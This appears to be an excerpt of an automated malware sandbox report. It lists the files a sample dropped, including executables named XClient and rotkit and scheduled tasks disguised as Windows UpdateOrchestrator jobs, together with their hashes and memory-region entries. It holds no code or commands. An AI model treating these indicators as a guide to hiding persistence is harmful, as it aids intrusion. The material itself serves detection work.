                                                                                                                                                                        6945e272e6f024aebd1bd5aec94212ee

                                                                                                                                                                        SHA1

                                                                                                                                                                        091926a67d057b0f733edf9dc1d80f93af5398c8

                                                                                                                                                                        SHA256

                                                                                                                                                                        0294a5215c7c18c33fad034fb154b7c16c3273081a4ab276cb60389a67942013

                                                                                                                                                                        SHA512

                                                                                                                                                                        dcf3c4794b8c9da575faae6e463b88d5e3dbd91bd7d87a5ac35d16c606f4bffd459736bc5108d57b7700c16f00cfd4e2e744ef0f5c2b2108c59432822490b089

                                                                                                                                                                      • C:\Users\Public\www.XClient.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        270KB

                                                                                                                                                                        MD5

                                                                                                                                                                        e517c44a1d94b26482966357955ae862

                                                                                                                                                                        SHA1

                                                                                                                                                                        61427663e8ad9dcc2e1338511fa934f22a2dfa6f

                                                                                                                                                                        SHA256

                                                                                                                                                                        e07015ea88987078352d3c581f636fdafd14dd620d85f55a1abf83b45bd29c9c

                                                                                                                                                                        SHA512

                                                                                                                                                                        985d4137ed1849261aa588082b8afd5e7ce49ab1458283e5bf06850ab5c15b4d4342156fafaef35e969199c5007009220e089fd9d9544c55ef5212b0b2195c8e

                                                                                                                                                                      • C:\Users\Public\www.rotkit.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        181KB

                                                                                                                                                                        MD5

                                                                                                                                                                        8d4a383b2c666be4f33695921263bb73

                                                                                                                                                                        SHA1

                                                                                                                                                                        9f565101a95a28a9b11f861306d3092417eb006d

                                                                                                                                                                        SHA256

                                                                                                                                                                        30bbd62a849b00c878ec5a30d66923d9c247623f385e9891874966761f284535

                                                                                                                                                                        SHA512

                                                                                                                                                                        ac8abd9461577cb9dec411d4e47dab666635c99e3ba2ca42834c9ce502a8892bec6254bf9564dd530aa3cf53de72773a258778d7eef22882c6ee3e57d6602edc

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                                        SHA1

                                                                                                                                                                        98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                                        SHA256

                                                                                                                                                                        ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                                        SHA512

                                                                                                                                                                        c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f313c5b4f95605026428425586317353

                                                                                                                                                                        SHA1

                                                                                                                                                                        06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                        SHA256

                                                                                                                                                                        129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                                        SHA512

                                                                                                                                                                        b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                                        SHA1

                                                                                                                                                                        a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                                        SHA256

                                                                                                                                                                        98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                                        SHA512

                                                                                                                                                                        1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                                        SHA1

                                                                                                                                                                        63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                                        SHA256

                                                                                                                                                                        727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                                        SHA512

                                                                                                                                                                        f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                                        SHA1

                                                                                                                                                                        5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                                        SHA256

                                                                                                                                                                        55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                                        SHA512

                                                                                                                                                                        5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                        SHA1

                                                                                                                                                                        9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                        SHA256

                                                                                                                                                                        a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                        SHA512

                                                                                                                                                                        c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                      • C:\Windows\Temp\1a5z8r0t.tmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        37KB

                                                                                                                                                                        MD5

                                                                                                                                                                        e00dcc76e4dcd90994587375125de04b

                                                                                                                                                                        SHA1

                                                                                                                                                                        6677d2d6bd096ec1c0a12349540b636088da0e34

                                                                                                                                                                        SHA256

                                                                                                                                                                        c8709f5a8b971d136e2273d66e65449791ca8eba1f47dd767733ea52ee635447

                                                                                                                                                                        SHA512

                                                                                                                                                                        8df7bc46ef0b2e2d4da6d8f31b102ff4813c6544cb751eb700b79fa0fae780814551b58ec8d19ff29cbf8547709add7eef637a52a217714d1a18b450f6755ec8

                                                                                                                                                                      • C:\Windows\Temp\3o9b4v8m.tmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        37KB

                                                                                                                                                                        MD5

                                                                                                                                                                        3bc9acd9c4b8384fb7ce6c08db87df6d

                                                                                                                                                                        SHA1

                                                                                                                                                                        936c93e3a01d5ae30d05711a97bbf3dfa5e0921f

                                                                                                                                                                        SHA256

                                                                                                                                                                        a3d7de3d70c7673e8af7275eede44c1596156b6503a9614c47bad2c8e5fa3f79

                                                                                                                                                                        SHA512

                                                                                                                                                                        f8508376d9fb001bce10a8cc56da5c67b31ff220afd01fb57e736e961f3a563731e84d6a6c046123e1a5c16d31f39d9b07528b64a8f432eac7baa433e1d23375

                                                                                                                                                                      • C:\Windows\Temp\__PSScriptPolicyTest_ncgbnq1i.2wq.ps1

                                                                                                                                                                        Filesize

                                                                                                                                                                        60B

                                                                                                                                                                        MD5

                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                        SHA1

                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                        SHA256

                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                        SHA512

                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                      • C:\Windows\Temp\autB8B1.tmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        14KB

                                                                                                                                                                        MD5

                                                                                                                                                                        9d5a0ef18cc4bb492930582064c5330f

                                                                                                                                                                        SHA1

                                                                                                                                                                        2ec4168fd3c5ea9f2b0ab6acd676a5b4a95848c8

                                                                                                                                                                        SHA256

                                                                                                                                                                        8f5bbcc572bc62feb13a669f856d21886a61888fd6288afd066272a27ea79bb3

                                                                                                                                                                        SHA512

                                                                                                                                                                        1dc3387790b051c3291692607312819f0967848961bc075799b5a2353efadd65f54db54ddf47c296bb6a9f48e94ec83086a4f8bf7200c64329a73fc7ec4340a4

                                                                                                                                                                      • C:\Windows\Temp\autB8B2.tmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        12KB

                                                                                                                                                                        MD5

                                                                                                                                                                        efe44d9f6e4426a05e39f99ad407d3e7

                                                                                                                                                                        SHA1

                                                                                                                                                                        637c531222ee6a56780a7fdcd2b5078467b6e036

                                                                                                                                                                        SHA256

                                                                                                                                                                        5ea3b26c6b1b71edaef17ce365d50be963ae9f4cb79b39ec723fe6e9e4054366

                                                                                                                                                                        SHA512

                                                                                                                                                                        8014b60cef62ff5c94bf6338ee3385962cfc62aaa6c101a607c592ba00aea2d860f52e5f52be2a2a3b35310f135548e8d0b00211bfcf32d6b71198f5d3046b63

                                                                                                                                                                      • C:\Windows\Temp\autB8C3.tmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        7KB

                                                                                                                                                                        MD5

                                                                                                                                                                        ecffd3e81c5f2e3c62bcdc122442b5f2

                                                                                                                                                                        SHA1

                                                                                                                                                                        d41567acbbb0107361c6ee1715fe41b416663f40

                                                                                                                                                                        SHA256

                                                                                                                                                                        9874ab363b07dcc7e9cd6022a380a64102c1814343642295239a9f120cb941c5

                                                                                                                                                                        SHA512

                                                                                                                                                                        7f84899b77e3e2c0a35fb4973f4cd57f170f7a22f862b08f01938cf7537c8af7c442ef2ae6e561739023f6c9928f93a59b50d463af6373ed344f68260bc47c76

                                                                                                                                                                      • memory/592-4233-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/592-4166-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/740-334-0x00000000007D0000-0x0000000000801000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/740-30-0x00000000007D0000-0x0000000000801000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/976-3769-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/1196-3134-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/1384-2946-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/1512-1819-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/1580-2109-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/1832-1476-0x000000006ED00000-0x000000006ED4C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        304KB

                                                                                                                                                                      • memory/1852-3679-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/1968-1-0x0000000000F20000-0x0000000001024000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.0MB

                                                                                                                                                                      • memory/1968-0-0x00007FF985F33000-0x00007FF985F35000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/2024-427-0x0000020F9FED0000-0x0000020F9FEFA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/2024-362-0x0000020F9FB80000-0x0000020F9FBA2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        136KB

                                                                                                                                                                      • memory/2096-940-0x0000000004E60000-0x0000000004E82000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        136KB

                                                                                                                                                                      • memory/2096-1240-0x0000000006ED0000-0x0000000006F73000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        652KB

                                                                                                                                                                      • memory/2096-1124-0x0000000005E20000-0x0000000005E6C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        304KB

                                                                                                                                                                      • memory/2096-1112-0x0000000005DF0000-0x0000000005E0E000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        120KB

                                                                                                                                                                      • memory/2096-974-0x00000000058B0000-0x0000000005C04000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        3.3MB

                                                                                                                                                                      • memory/2096-941-0x0000000005550000-0x00000000055B6000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        408KB

                                                                                                                                                                      • memory/2096-1228-0x000000006ED00000-0x000000006ED4C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        304KB

                                                                                                                                                                      • memory/2096-853-0x0000000004EB0000-0x00000000054D8000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        6.2MB

                                                                                                                                                                      • memory/2096-807-0x00000000024F0000-0x0000000002526000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        216KB

                                                                                                                                                                      • memory/2096-1238-0x0000000006EA0000-0x0000000006EBE000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        120KB

                                                                                                                                                                      • memory/2096-1368-0x0000000007520000-0x0000000007528000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/2096-1367-0x0000000007540000-0x000000000755A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        104KB

                                                                                                                                                                      • memory/2096-1355-0x0000000007440000-0x0000000007454000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        80KB

                                                                                                                                                                      • memory/2096-1354-0x0000000007430000-0x000000000743E000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        56KB

                                                                                                                                                                      • memory/2096-1283-0x0000000007400000-0x0000000007411000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        68KB

                                                                                                                                                                      • memory/2096-1281-0x0000000007480000-0x0000000007516000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        600KB

                                                                                                                                                                      • memory/2096-1280-0x0000000007270000-0x000000000727A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        40KB

                                                                                                                                                                      • memory/2096-1257-0x0000000007200000-0x000000000721A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        104KB

                                                                                                                                                                      • memory/2096-1256-0x0000000007850000-0x0000000007ECA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        6.5MB

                                                                                                                                                                      • memory/2096-1227-0x0000000006E60000-0x0000000006E92000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        200KB

                                                                                                                                                                      • memory/2296-2570-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/2600-3409-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/2628-3042-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/2732-1428-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/3056-2203-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/3144-2478-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/3668-2384-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/3852-3498-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/3936-104-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-118-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-100-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-426-0x0000000004AA0000-0x0000000004B06000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        408KB

                                                                                                                                                                      • memory/3936-96-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-94-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-90-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-88-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-86-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-84-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-82-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-59-0x0000000002330000-0x0000000002368000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        224KB

                                                                                                                                                                      • memory/3936-62-0x00000000049B0000-0x00000000049E8000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        224KB

                                                                                                                                                                      • memory/3936-80-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-78-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-107-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-64-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-76-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-108-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-111-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-98-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-1545-0x00000000062B0000-0x0000000006854000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        5.6MB

                                                                                                                                                                      • memory/3936-1546-0x0000000006A40000-0x0000000006AD2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        584KB

                                                                                                                                                                      • memory/3936-1549-0x0000000006C30000-0x0000000006C3A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        40KB

                                                                                                                                                                      • memory/3936-74-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-114-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-116-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-103-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-120-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-122-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-333-0x00000000049F0000-0x0000000004A8C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        624KB

                                                                                                                                                                      • memory/3936-92-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-124-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-127-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-72-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-70-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-112-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-63-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-66-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3936-68-0x00000000049B0000-0x00000000049E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        196KB

                                                                                                                                                                      • memory/3948-1498-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/4024-360-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/4276-1911-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/4344-1429-0x000000006ED00000-0x000000006ED4C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        304KB

                                                                                                                                                                      • memory/4344-2293-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/4344-1413-0x0000000005FB0000-0x0000000006304000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        3.3MB

                                                                                                                                                                      • memory/4368-3588-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/4376-3320-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/4564-4143-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/4656-337-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/4656-15-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/4892-2006-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/5008-1638-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/5060-1729-0x0000000000640000-0x0000000000649000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        36KB

                                                                                                                                                                      • memory/5060-3229-0x0000000000400000-0x00000000004CD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        820KB

                                                                                                                                                                      • memory/5060-38-0x0000000000640000-0x0000000000649000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        36KB